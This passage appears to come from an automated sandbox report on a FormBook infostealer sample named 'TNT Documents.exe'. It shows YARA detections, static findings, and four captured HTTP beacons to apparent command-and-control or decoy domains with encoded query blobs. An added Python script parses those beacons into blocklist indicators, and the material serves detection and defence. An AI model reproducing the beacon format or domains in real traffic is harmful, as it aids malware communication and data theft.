Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/slnt
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/soft
Source: TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp | String found in binary or memory: http://www.monotype.
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comus4
          Source: TNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: TNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comU
          Source: TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de2
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.der
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn9
          Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: unknown | DNS traffic detected: queries for: www.cortepuroiberico.com
          Source: global traffic | HTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1 | Host: www.cortepuroiberico.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1 | Host: www.specialtyplastics.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1 | Host: www.metronixmedical.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1 | Host: www.coached.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
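The four HTTP rows above are FormBook check-in beacons: the same URI path and the same two query parameter names on every request, a base64 blob in the first parameter that changes per request, a constant value in the second, and a body of seven null bytes. The script below is an added example (not part of the Joe Sandbox report): it takes the four rows exactly as they appear on this page, parses them with a regular expression written for that run-together form, and extracts the host list plus the request profile that stays constant across hosts, which is what a network blocklist or an IDS rule would key on. One caveat a practitioner should keep in mind, from general knowledge of the FormBook family rather than from this report: FormBook cycles through a built-in list of domains of which most are decoys unrelated to the operator, so the hosts below are hunt and block candidates, not a confirmed C2 list.

```python
"""Pull blocklist/hunt indicators out of the FormBook beacon requests above.

Added example, not code from the Joe Sandbox report. The request rows are
copied from the report in the run-together form the page shows them; the
parser and the "beacon profile" notion are this example's own.
"""
import re
from dataclasses import dataclass

# Constructed input: the four "HTTP traffic detected" rows above, verbatim.
REPORT_ROWS = [
    "GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1Host: www.cortepuroiberico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1Host: www.specialtyplastics.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.coached.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
]

# The extracted page has no separator between the request line and the headers,
# so the pattern tolerates "HTTP/1.1Host:" and "www.host.tldConnection:".
ROW_RE = re.compile(
    r"GET (?P<target>\S+) HTTP/1\.[01]\s*Host: (?P<host>\S+?)\s*Connection: (?P<conn>close|keep-alive)"
)
# Standard base64 alphabet with optional '=' padding (not the URL-safe variant).
BASE64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


@dataclass(frozen=True)
class Beacon:
    host: str
    path: str
    params: tuple   # ordered (name, value) pairs, values kept raw
    connection: str


def split_query(query: str) -> tuple:
    """Split a query string without touching '+' or '/' inside the values.
    urllib.parse.parse_qsl would turn '+' into a space and corrupt the base64."""
    if not query:
        return ()
    pairs = []
    for item in query.split("&"):
        name, _, value = item.partition("=")
        pairs.append((name, value))
    return tuple(pairs)


def parse_row(row: str) -> Beacon:
    m = ROW_RE.search(row)
    if m is None:
        raise ValueError("no HTTP GET request found in row: %r" % row[:60])
    path, _, query = m["target"].partition("?")
    return Beacon(host=m["host"], path=path, params=split_query(query), connection=m["conn"])


def beacon_profile(b: Beacon) -> tuple:
    """The part of a beacon that is stable across hosts: URI path, parameter
    names, and the value of the trailing parameter. The first parameter carries
    the per-request blob and is deliberately left out."""
    names = tuple(name for name, _ in b.params)
    return (b.path, names, b.params[-1][1] if b.params else None)


def matches_profile(b: Beacon, reference: Beacon) -> bool:
    """Same path/parameter profile as `reference` and a base64-shaped first value."""
    if beacon_profile(b) != beacon_profile(reference):
        return False
    first_value = b.params[0][1] if b.params else ""
    return BASE64_RE.fullmatch(first_value) is not None


def extract_iocs(rows) -> dict:
    """Hosts that share the first row's beacon profile, plus the profile itself."""
    beacons = [parse_row(r) for r in rows]
    ref = beacons[0]
    return {
        "hosts": sorted({b.host for b in beacons if matches_profile(b, ref)}),
        "uri_path": ref.path,
        "query_names": [name for name, _ in ref.params],
        "constant_param": ref.params[-1],
        "all_match_profile": all(matches_profile(b, ref) for b in beacons),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(REPORT_ROWS).items():
        print(f"{key}: {value}")
```

The profile (path `/how6/`, parameter names `iN9tFB` and `4h`, constant `7n_DRJGxnRd`) is what ties the four hosts together; a rule written on the hosts alone misses the next decoy in the list, while a rule on the profile catches every beacon of this build.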

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: TNT Documents.exe
          .NET source code contains very large strings
          Source: TNT Documents.exe, Form1.cs | Long String: Length: 22528
          Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs | Long String: Length: 22528
          Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs | Long String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs | Long String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs | Long String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs | Long String: Length: 22528
          Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs | Long String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs | Long String: Length: 22528
          Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs | Long String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs | Long String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs | Long String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs | Long String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs | Long String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs | Long String: Length: 22528
          Source: TNT Documents.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
